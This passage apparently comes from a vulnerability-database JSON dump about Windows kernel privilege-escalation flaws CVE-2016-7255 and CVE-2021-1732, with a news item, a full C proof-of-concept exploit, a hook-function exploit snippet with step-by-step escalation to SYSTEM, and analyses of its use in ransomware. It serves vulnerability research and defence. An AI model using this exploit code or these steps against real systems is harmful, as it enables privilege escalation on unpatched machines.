easily, turning the security weakness into an ideal candidate for exploitation in the wild.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-02-10T04:44:00", "type": "thn", "title": "Microsoft Issues Patches for In-the-Wild 0-day and 55 Others Windows Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-1722", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24081", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-24100", "CVE-2021-24114", "CVE-2021-26701"], "modified": "2021-02-15T11:58:01", "id": "THN:0C87C22B19E7073574F7BA69985A07BF", "href": "https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:02:45", "description": "If the Windows kernel-mode drivers do not properly handle objects in memory, then there will be multiple elevation of Privilege vulnerabilities. Successful exploitation of this vulnerability an attacker can run in kernel mode arbitrary code. An attacker could then install programs; view, change, or delete data; or create with full user permissions to the new account.\n\nThe attacker must first log in to the system, and then to exploit these vulnerabilities. Then the attacker can run a exploit these vulnerabilities and through the Special design of the application, allowing control of the affected system. The update addresses the vulnerabilities by correcting Windows kernel-mode driver handles objects in memory to resolve these vulnerabilities.\n", "cvss3": {}, "published": "2016-11-10T00:00:00", "type": "seebug", "title": "Win32k elevation of privilege vulnerability MS16-135\uff09(CVE-2016-7255)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7255"], "modified": "2016-11-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92530", "id": "SSV:92530", "sourceData": "\n // \u53c2\u8003 https://github.com/tinysec/public/tree/master/CVE-2016-7255\r\n\r\n#include <windows.h>\r\n#include <wchar.h>\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n\r\n\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"user32.lib\")\r\n\r\n#undef DbgPrint\r\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\r\nULONG __cdecl DbgPrint(__in char* Format, ...)\r\n{\r\n CHAR* pszDbgBuff = NULL;\r\n va_list VaList=NULL;\r\n ULONG ulRet = 0;\r\n\r\n do \r\n {\r\n pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\r\n if (NULL == pszDbgBuff)\r\n {\r\n break;\r\n }\r\n RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\r\n\r\n va_start(VaList,Format);\r\n\r\n _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\r\n\r\n DbgPrintEx(77 , 0 , pszDbgBuff );\r\n OutputDebugStringA(pszDbgBuff);\r\n\r\n va_end(VaList);\r\n\r\n } while (FALSE);\r\n\r\n if (NULL != pszDbgBuff)\r\n {\r\n HeapFree( GetProcessHeap(), 0 , pszDbgBuff );\r\n pszDbgBuff = NULL;\r\n }\r\n\r\n return ulRet;\r\n}\r\n\r\n\r\n int _sim_key_down(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n\r\n do \r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = 0;\r\n\r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n int _sim_key_up(WORD wKey)\r\n {\r\n INPUT stInput = {0};\r\n\r\n do \r\n {\r\n stInput.type = INPUT_KEYBOARD;\r\n stInput.ki.wVk = wKey;\r\n stInput.ki.dwFlags = KEYEVENTF_KEYUP;\r\n\r\n SendInput(1 , &stInput , sizeof(stInput) );\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n int _sim_alt_shift_esc()\r\n {\r\n int i = 0;\r\n\r\n do \r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n\r\n\r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n\r\n _sim_key_down( VK_ESCAPE);\r\n _sim_key_up( VK_ESCAPE);\r\n\r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n\r\n\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\r\n\r\n\r\n\r\n int _sim_alt_shift_tab(int nCount)\r\n {\r\n int i = 0;\r\n HWND hWnd = NULL;\r\n\r\n\r\n int nFinalRet = -1;\r\n\r\n do \r\n {\r\n _sim_key_down( VK_MENU );\r\n _sim_key_down( VK_SHIFT ); \r\n\r\n\r\n for ( i = 0; i < nCount ; i++)\r\n {\r\n _sim_key_down( VK_TAB);\r\n _sim_key_up( VK_TAB);\r\n\r\n Sleep(1000);\r\n\r\n }\r\n\r\n\r\n _sim_key_up( VK_MENU );\r\n _sim_key_up( VK_SHIFT ); \r\n } while (FALSE);\r\n\r\n return nFinalRet;\r\n}\r\n\r\n\r\n\r\nint or_address_value_4(__in void* pAddress)\r\n{\r\n WNDCLASSEXW stWC = {0};\r\n\r\n HWND hWndParent = NULL;\r\n HWND hWndChild = NULL;\r\n\r\n WCHAR* pszClassName = L\"cve-2016-7255\";\r\n WCHAR* pszTitleName = L\"cve-2016-7255\";\r\n\r\n void* pId = NULL;\r\n MSG stMsg = {0};\r\n\r\n do \r\n {\r\n\r\n stWC.cbSize = sizeof(stWC);\r\n stWC.lpfnWndProc = DefWindowProcW;\r\n stWC.lpszClassName = pszClassName;\r\n\r\n if ( 0 == RegisterClassExW(&stWC) )\r\n {\r\n break;\r\n }\r\n\r\n hWndParent = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n NULL,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE,\r\n 0,\r\n 0,\r\n 360,\r\n 360,\r\n NULL,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n\r\n if (NULL == hWndParent)\r\n {\r\n break;\r\n }\r\n\r\n hWndChild = CreateWindowExW(\r\n 0,\r\n pszClassName,\r\n pszTitleName,\r\n WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\r\n 0,\r\n 0,\r\n 160,\r\n 160,\r\n hWndParent,\r\n NULL,\r\n GetModuleHandleW(NULL),\r\n NULL\r\n );\r\n\r\n if (NULL == hWndChild)\r\n {\r\n break;\r\n }\r\n\r\n #ifdef _WIN64\r\n pId = ( (UCHAR*)pAddress - 0x28 ); \r\n #else\r\n pId = ( (UCHAR*)pAddress - 0x14); \r\n #endif // #ifdef _WIN64\r\n\r\n SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\r\n\r\n DbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\r\n DebugBreak();\r\n\r\n ShowWindow(hWndParent , SW_SHOWNORMAL);\r\n\r\n SetParent(hWndChild , GetDesktopWindow() );\r\n\r\n SetForegroundWindow(hWndChild);\r\n\r\n _sim_alt_shift_tab(4);\r\n\r\n SwitchToThisWindow(hWndChild , TRUE);\r\n\r\n _sim_alt_shift_esc();\r\n\r\n\r\n while( GetMessage(&stMsg , NULL , 0 , 0) )\r\n { \r\n TranslateMessage(&stMsg);\r\n DispatchMessage(&stMsg);\r\n }\r\n\r\n\r\n } while (FALSE);\r\n\r\n if ( NULL != hWndParent )\r\n {\r\n DestroyWindow(hWndParent);\r\n hWndParent = NULL;\r\n }\r\n\r\n if ( NULL != hWndChild )\r\n {\r\n DestroyWindow(hWndChild);\r\n hWndChild = NULL;\r\n }\r\n\r\n UnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\r\n\r\n return 0;\r\n}\r\n\r\nint __cdecl wmain(int nArgc, WCHAR** Argv)\r\n{\r\n do \r\n {\r\n or_address_value_4( (void*)0xFFFFFFFF );\r\n } while (FALSE);\r\n\r\n return 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92530", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-08-26T20:38:29", "description": "# CVE-2021-1732: win32kfull xxxCreateWindowEx callback out-of-bounds\n\nMar 25, 2021 \u2022 iamelli0t\n\nCVE-2021-1732 is a 0-Day vulnerability exploited by the BITTER APT\norganization in one operation which was disclosed in February this\nyear[1][2][3]. This vulnerability exploits a user mode callback opportunity in\nwin32kfull module to break the normal execution flow and set the error flag of\nwindow object (tagWND) extra data, which results in kernel-space out-of-bounds\nmemory access violation.\n\n## Root cause analysis\n\nThe root cause of CVE-2021-1732 is: \nIn the process of creating window (CreateWindowEx), when the window object\ntagWND has extra data (tagWND.cbwndExtra != 0), the function pointer of\nuser32!_xxxClientAllocWindowClassExtraBytes saved in\nntdll!_PEB.kernelCallbackTable (offset+0x58) in user mode will be called via\nthe nt!KeUserModeCallback callback mechanism, and the system heap allocator\n(ntdll!RtlAllocateHeap) is used to allocate the extra data memory in user-\nspace. \nBy hooking user32!_xxxClientAllocWindowClassExtraBytes function in user mode,\nand modifying the properties of the window object extra data in the hook\nfunction manually, the kernel mode atomic operation of allocating memory for\nextra data can be broken, then the out-of-bounds read/write ability based on\nthe extra data memory is achieved finally. \n\n\nThe normal flow of the window object creation (CreateWindowEx) process is\nshown as follows (partial): \n \n\n\nFrom the above figure, we can see that: when the window extra data size\n(tagWND.cbWndExtra) is not 0, win32kfull!xxxCreateWindowEx calls the user mode\nfunction user32!_xxxClientAllocWindowClassExtraBytes via the kernel callback\nmechanism, requests for the memory of the window extra data in user-space.\nAfter allocation, the pointer of allocated memory in user-space will be\nreturned to the tagWND.pExtraBytes property: \n \n\n\nHere are two modes of saving tagWND extra data address (tagWND.pExtraBytes): \n[Mode 1] **In user-space system heap** \nAs the normal process shown in the figure above, the pointer of extra data\nmemory allocated in user-space system heap is saved in tagWND.pExtraBytes\ndirectly. \nOne tagWND memory layout of Mode 1 is shown in the following figure: \n \n\n\n[Mode 2] **In kernel-space desktop heap** \nThe function ntdll!NtUserConsoleControl allocates extra data memory in kernel-\nspace desktop heap by function DesktopAlloc, calculates the offset of\nallocated extra data memory address to the kernel desktop heap base address,\nsaves the offset to tagWND.pExtraBytes, and modifies tagWND.extraFlag |=\n0x800: \n \n\n\nOne tagWND memory layout of Mode 2 is shown in the following figure:\n \n\n\nSo we can hook the function user32!_xxxClientAllocWindowClassExtraBytes in\nuser-space, call NtUserConsoleControl manually in hook function to modify the\ntagWND extra data storage mode from Mode 1 to Mode 2, call\nntdll!NtCallbackReturn before the callback returns: \n \n\n\nThen return the user mode controllable offset value to tagWND.pExtraBytes\nthrough ntdll!NtCallbackReturn, and realize the controllable offset out-of-\nbounds read/write ability based on the kernel-space desktop heap base address\nfinally. \n\n\nThe modified process which can trigger the vulnerability is shown as follows: \n \n\n\nAccording to the modified flowchart above, the key steps of triggering this\nvulnerability are explained as follows: \n\n 1. Modify the user32!_xxxClientAllocWindowClassExtraBytes function pointer in PEB.kernelCallbackTable to a custom hook function.\n 2. Create some normal window objects, and leak the user-space memory addresses of these tagWND kernel objects through user32!HMValidateHandle.\n 3. Destroy part of the normal window objects created in step 2, and create one new window object named 'hwndMagic' with the specified tagWND.cbwndExtra. The hwndMagic can probably reuse the previously released window object memory. Therefore, by searching the previously leaked window object user-space memory addresses with the specified tagWND.cbwndExtra in the custom hook function, the hwndMagic can be found before CreateWindowEx returns.\n 4. Call NtUserConsoleControl in the custom hook function to modify the tagWNDMagic.extraFlag with flag 0x800.\n 5. Call NtCallbackReturn in the custom hook function to assign a fake offset to tagWNDMagic.pExtraBytes.\n 6. Call SetWindowLong to write data to the address of kernel-space desktop heap base address + specified offset, which can result in out-of-bounds memory access violation.\n\nAn implementation of the hook function is demonstrated as follows: \n\n\n\u200b \n\n void* WINAPI MyxxxClientAllocWindowClassExtraBytes(ULONG* size) {\n \n \tdo {\n \t\tif (MAGIC_CBWNDEXTRA == *size) {\n \t\t\tHWND hwndMagic = NULL;\n \t\t\t//search from freed NormalClass window mapping desktop heap\n \t\t\tfor (int i = 2; i < 50; ++i) {\n \t\t\t\tULONG_PTR cbWndExtra = *(ULONG_PTR*)(g_pWnd[i] + _WND_CBWNDEXTRA_OFFSET);\n \t\t\t\tif (MAGIC_CBWNDEXTRA == cbWndExtra) {\n \t\t\t\t\thwndMagic = (HWND)*(ULONG_PTR*)(g_pWnd[i]);\n \t\t\t\t\tprintf(\"[+] bingo! find &hwndMagic = 0x%llx in callback :) \\n\", g_pWnd[i]);\n \t\t\t\t\tbreak;\n \t\t\t\t}\n \t\t\t}\n \t\t\tif (!hwndMagic) {\n \t\t\t\tprintf(\"[-] Not found hwndMagic, memory layout unsuccessfully :( \\n\");\n \t\t\t\tbreak;\n \t\t\t}\n \n \t\t\t// 1. set hwndMagic extraFlag |= 0x800\n \t\t\tCONSOLEWINDOWOWNER consoleOwner = { 0 };\n \t\t\tconsoleOwner.hwnd = hwndMagic;\n \t\t\tconsoleOwner.ProcessId = 1;\n \t\t\tconsoleOwner.ThreadId = 2;\n \t\t\tNtUserConsoleControl(6, &consoleOwner, sizeof(consoleOwner));\n \n \t\t\t// 2. set hwndMagic pExtraBytes fake offset\n \t\t\tstruct {\n \t\t\t\tULONG_PTR retvalue;\n \t\t\t\tULONG_PTR unused1;\n \t\t\t\tULONG_PTR unused2;\n \t\t\t} result = { 0 };\t\t\n \t\t\t//offset = 0xffffff00, access memory = heap base + 0xffffff00, trigger BSOD\t\n \t\t\tresult.retvalue = 0xffffff00;\t\t\t\n \t\t\tNtCallbackReturn(&result, sizeof(result), 0);\n \t\t}\n \t} while (false);\n \n \treturn _xxxClientAllocWindowClassExtraBytes(size);\n }\n\n\nBSOD snapshot: \n \n\n\n## Exploit analysis\n\nFrom Root cause anaysis, we can see that: \n**\" An opportunity to read/write data in the address which calculated by the\nkernel-space desktop heap base address + specified offset\"** can be obtained\nvia this vulnerability.\n\n\nFor the kernel mode exploitation, the attack target is to obtain system token\ngenerally. A common method is shown as follows: \n\n 1. Exploit the vulnerability to obtain a arbitrary memory read/write primitive in kernel-space.\n 2. Leak the address of some kernel object, find the system process through the EPROCESS chain.\n 3. Copy the system process token to the attack process token to complete the privilege escalation job.\n\nThe obstacle is step 1: How to exploit **\" An opportunity to read/write data\nin the address which calculated by the kernel-space desktop heap base address\n\n+ specified offset\"** to obtain the arbitrary memory read/write primitive in\n kernel-space. \n\nOne solution is shown in the following figure: \n \n\n\n 1. The offset of tagWNDMagic extra data (wndMagic_extra_bytes) is controllable via the vulnerability, so we can use SetWindowLong to modify the data in specified address calculated by desktop heap base address + controllable offset.\n 2. Use the vulnerability ability to modify tagWNDMagic.pExtraBytes to the offset of tagWND0 (the offset of tagWND0 is obtained by tagWND0+0x8), call SetWindowLong to modify tagWND0.cbWndExtra = 0x0fffffff to obtain a tampered tagWND0.pExtraBytes which can achieve read/write out-of-bounds.\n 3. Calculate the offset from tagWND0.pExtraBytes to tagWND1, call SetWindowLongPtr to replace the spMenu of tagWND1 with a fake spMenu by the tampered tagWND0.pExtraBytes, realize the arbitrary memory read ability with the help of fake spMenu and function GetMenuBarInfo. \n The logic of GetMenuBarInfo to read the data in specified address is shown as\n follows, the 16 bytes data is stored into MENUBARINFO.rcBar structure:\n  \n\n\n 4. Use the tampered tagWND0.pExtraBytes to modify tagWND1.pExtraBytes with specified address, and use the SetWindowLongPtr of tagWND1 to obtain the arbitrary memory write ability.\n 5. After obtaining the arbitrary memory read/write primitive, we need to leak a kernel object address in desktop heap to find EPROCESS. Fortunately, when setting the fake spMenu for tagWND1 in step 3, the return value of SetWindowLongPtr is the kernel address of original spMenu, which can be used directly.\n 6. Finally, find the system process by traversing the EPROCESS chain, and copy the system process token to the attack process to complete the privilege escalation job. This method is relatively common, so will not be described in detail.\n\nThe final privilege escalation demonstration: \n \n\n\n## References\n\n[1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732 \n[2] https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-\nzero-day-exploit-is-used-by-bitter-apt-in-targeted-attack-cn/ \n[3]\nhttps://www.virustotal.com/gui/file/914b6125f6e39168805fdf57be61cf20dd11acd708d7db7fa37ff75bf1abfc29/detection \n[4] https://en.wikipedia.org/wiki/Privilege_escalation", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-26T00:00:00", "type": "seebug", "title": "Microsoft Windows\u672c\u5730\u63d0\u6743\u6f0f\u6d1e\uff08CVE-2021-1732\uff09", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-03-26T00:00:00", "id": "SSV:99168", "href": "https://www.seebug.org/vuldb/ssvid-99168", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "myhack58": [{"lastseen": "2017-03-23T07:22:58", "edition": 2, "description": "0x1 Foreword\n\n360 Internet Security Center recently captured a\u201cceber\u201dblackmailer Trojan variants, the variants with other\u201cceber\u201dblackmailer Trojan variants in the code The execution flow and not too big difference. Only it is worth noting that the Trojan exploit CVE-2016-7255 privilege elevation vulnerability on its own. right. This article will analyze the blackmailer for CVE-2016-7255 privilege elevation vulnerability in the use of the process.\n\n0x2 vulnerability details\n\nThe problem code is in win32k! xxxNextWindow, due to the lack of the necessary checks directly to the tagWND+0xC0 members offset 0x28 corresponding to the address of the value with 4 or operation, and tagWND+0xC0 is controllable, which leads to arbitrary address write. The vulnerable code is shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417778. png)\n\nFigure 1 vulnerable code\n\nFig. v12 shows is tagWND structure, the structure as shown in omitted section.\n\n! [](/Article/UploadPic/2017-3/201732314417810. png)\n\nFigure 2 tagWND structure of the body\n\nFrom the above figure it can be seen, tagWND+0xC0 corresponds spmenu members, if there is a user state function can be the member of the assignment, you can trigger any address write. For 32-bit systems, you can directly call the SetWindowLong function SetWindowLong function will call the kernel mode function NtUserSetWindowLong the completion of this function; for 64-bit systems, does not exist you can use the user state function, but you can use the syscall of the way to call the kernel mode function NtUserSetWindowLong or function NtUserSetWindowLongPtr to complete this work. The following description is NtUserSetWindowLong function, NtUserSetWindowLongPtr the function execution process is the same.\n\nNtUserSetWindowLong function is just a shell, it will pass the parameter to the xxxSetWindowLong and call it, the function is shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417836. png)\n\nFigure 3 xxxSetWindowLong function\n\nIn this function, the incoming nIndex judgment, and according to the nIndex value to perform the corresponding operation. For nIndex value of -16, and -20, and -12, and-21 situation, will call xxxSetWindowData function for processing. As shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417404. png)\n\nFigure 4 call xxxSetWindowData function for processing\n\nThe function receives xxxSetWindowLong of the parameters, when the nIndex parameter is-12 out of GWL_ID, and the operation of the window style is WS_CHILD or WS_CHILDWINDOW\uff080x40000000, will be the operation window tagWND structure spmenu members of the value set to dwNewLong it. As shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417349. png)\n\nFigure 5 The trigger of the position of vulnerability\n\nSince dwNewLong is to call NtUserSetWindowLong function when parameters are passed, the user mode process can use the syscall feel free to control it. And win32k! xxxNextWindow function of spmenu+0x28 members of With 4 or operation, thus triggering the arbitrary address write.\n\n0x3 exploit analysis\n\nFrom the vulnerability detail can be seen, the user mode process have to tagWND structure spmenu members the right to amend, the member is a tagMENU structure body, the structure is defined as shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417245. png)\n\nFigure 6 tagMENU structure of the body\n\nNot difficult to see, xxxNextWindow function to modify the value is spmenu the fFlags member of the offset 0x28, and since the members with 0x4 or operation, and therefore the vulnerability can only be modified 1bit size of the area.\n\nYou can only modify 1bit on the surface it looks seemingly of little value, however this Trojan variant is not only to focus on this 1bit, but transferred to the tagWND structure of the cbWNDExtra member that represents the window the additional data size. If you can pass the Modify window the additional data size to cover the key address, and then re-use other way to write data, you can achieve perfect utilization.\n\nThen to complete the cbWNDExtra member of the write operation, it must obtain the cbWNDExtra member of the address or is the cbWNDExtra member relative to a known address offset. Except you must also obtain the additional address of the data or is relative to a known address offset to be calculated and written. For obtaining the cbWNDExtra member of the address, the Trojan creates two window\u201cExtraWnd1\u201dand\u201cExtraWND2\u201d, and the two Windows differs in its window class. cbWndExtra member that corresponds exactly to the tagWND the cbWNDExtra member. The program will be two window class. cbWndExtra members were assigned to 0x118 and 0x130, as shown below.\n\n! [](/Article/UploadPic/2017-3/201732314417654. png)\n\nFigure 7 create two Windows\n\nCreate a window after is to get the cbWNDExtra member of the tagWND structure of the offset, using HMValidateHandle function. The function and not in user mode export, but there's a user mode function IsMenu call it. Trojan horse determined by IsMenu related byte code of the location acquisition HMValidateHandle address.\n\n! [](/Article/UploadPic/2017-3/201732314417116. png)\n\nFigure 8 The use of byte-code positioning function\n\nHMValidateHandle function will leak tagWND structure of the content, so the Trojan can easily locate the cbWNDExtra member of the tagWND structure of the offset. For insurance purposes, the Trojan determines the two window tagWND structure of the cbWNDExtra member of the offset, when the two cbWNDExtra to register the window class to set the value of the 0x118 and 0x130 and offset are the same before the description of the offset effective.\n\n! [](/Article/UploadPic/2017-3/201732314417591. png)\n\n**[1] [[2]](<84568_2.htm>) [[3]](<84568_3.htm>) [next](<84568_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-23T00:00:00", "type": "myhack58", "title": "\u201ccerber\u201dblackmailer for CVE-2016-7255 exploit analysis-exploit warning-the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255"], "modified": "2017-03-23T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/84568.htm", "id": "MYHACK58:62201784568", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-01T14:57:29", "edition": 2, "description": "The Windows kernel mention the right Vulnerability, CVE-2016-7255 has been a lot of media attention. In the 11 month's Patch Tuesday, Microsoft released for this vulnerability fix, as MS16-135 announcement of the part. According to Microsoft's description, CVE-2016-7255 mainly used to perform targeted attacks, and by some of the\u201cwild way\u201dto find samples. Google and Microsoft have confirmed that a Russian hacker group APT28 used a Flash Vulnerability, CVE-2016-7855 and this kernel mention the right vulnerability to perform a targeted attack, Google also released some for this vulnerability the discussion: \nhttps://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html \nhttps://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/ \nhttp://securityaffairs.co/wordpress/53242/hacking/cve-2016-7255-zero-day.html \nMcAfee Labs vulnerability research team spent a lot of time to analyze this vulnerability. In this article we will briefly discuss some of our findings. \nAnalysis \nWe first from MS16-135 patch to start the analysis, \u5f88\u5feb\u6211\u4eec\u5c31\u6ce8\u610f\u5230MS16-135\u5728\u76ee\u6807\u7cfb\u7edf\u4e0a\u66f4\u65b0\u4e86win32k.sys so our next step is to start comparing through binary differential means two win32k. sys file to install the patch before and after it. In addition, our test system is running Windows 7, The version number is 6. 1. 7601. 23584\u3002 \nLook at the binary difference of the results, we note that the following function is modified. \n! [](/Article/UploadPic/2016-12/201612312262609. png? www. myhack58. com) \nFigure 1: in win32k. sys is to change the function-xxxNextWindow \nAfter these preliminary investigations we conclude that: CVE-2016-7255 to the patch fully applied to the repair win32k. sys in xxxNextWindow function. \nThe following screenshot shows a patch of xxxNextWindow(x, x)the change of a more advanced overview: \n! [](/Article/UploadPic/2016-12/201612312262532. png? www. myhack58. com) \nFigure 2: The function xxxNextWindow advanced differential results\nWe can see in the repair function to add some new logic, with a red highlight. Zoom in to the first newly inserted basic block, we can see the introduction of a new code to eax + 0x23 compares the value of the operation: \n! [](/Article/UploadPic/2016-12/201612312262346. png? www. myhack58. com) \nFigure 3: xxxNextWindow inserted into the first basic block\nThen, our next newly inserted basic block saw a similar logic. \n! [](/Article/UploadPic/2016-12/201612312262724. png? www. myhack58. com) \nFigure 4: xxxNextWindow inserted in the second basic block\nGoogle has stated that the vulnerability\u201ccan be obtained by win32k. sys system call NtSetWindowLongPtr()for GWL_STYLE set to WS_CHILD window handle on the index GWLP_ID trigger.\u201c \nIn fact, NtSetWindowLongPtr()only played trigger this vulnerability to the role, and the fundamental reason is that xxxNextWindow it. More specifically, by NtSetWindowLongPtr()to set inappropriate parameter can trigger xxxNextWindow in the\u201cany address write\u201dscene. \nNow let's look at the unpatched xxxNextWindow(x, x, ...)of the decompiled version. \n! [](/Article/UploadPic/2016-12/201612312262345. png? www. myhack58. com) \nFigure 5: unrepaired xxxNextWindow the decompiled version\nApply the patch after xxxNextWindow(x, x, ...)as shown below: \n! [](/Article/UploadPic/2016-12/201612312262846. png? www. myhack58. com) \nFigure 6: the repaired xxxNextWindow the decompiled version\nPatched after the code using a conditional branch statement\u201c(*(_BYTE *)(v8 + 0x23) & 0xC0) != 0x40\u201denhanced parameter validation. \nIn this new statement, the variable v8 in eax is a GetNextQueueWindow call return value. \uff08See Figure\uff09 \n! [](/Article/UploadPic/2016-12/201612312262410. png? www. myhack58. com) \nFigure 7: variable v8 from the GetNextQueueWindow the call:\u201cv8 = _GetNextQueueWindow(v7, v31, 1);\u201d \nQuick View _GetNextQueueWindow(x, x, ...)is achieved, it reveals the function actually returns a pointer to the tagWND structure pointer. \nThe following figure shows the windbg in tagWND structure: \n! [](/Article/UploadPic/2016-12/201612312262587. png? www. myhack58. com) \nFigure 8: tagWND structure\nAnalyzing this code, we can get to know tagWND configuration offset 0x78 of the field is with the vulnerabilities associated. The following from a not repair function to decompile the lines of code confirms this: \n! [](/Article/UploadPic/2016-12/201612312262301. png? www. myhack58. com) \nFigure 9: unrepaired xxxNextWindow problems in the code\nNow the question becomes simple: if we can control in the v8+0x78 the value at the address, it is possible in the core region of an arbitrary address for a write operation, and it is likely you can achieve the mentioned rights. Fortunately, a user state of the API NtSetWindowLongPtr it can be used in this position is set to any value. \nThe following figure shows, we passed to the NtSetWindowLongPtr value, 0x41414141, is the reflection to the tagWND structure, through this vulnerability you can easily achieve arbitrary memory write. \n! [](/Article/UploadPic/2016-12/201612312262505. png? www. myhack58. com)\n\n**[1] [[2]](<82548_2.htm>) [next](<82548_2.htm>)**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 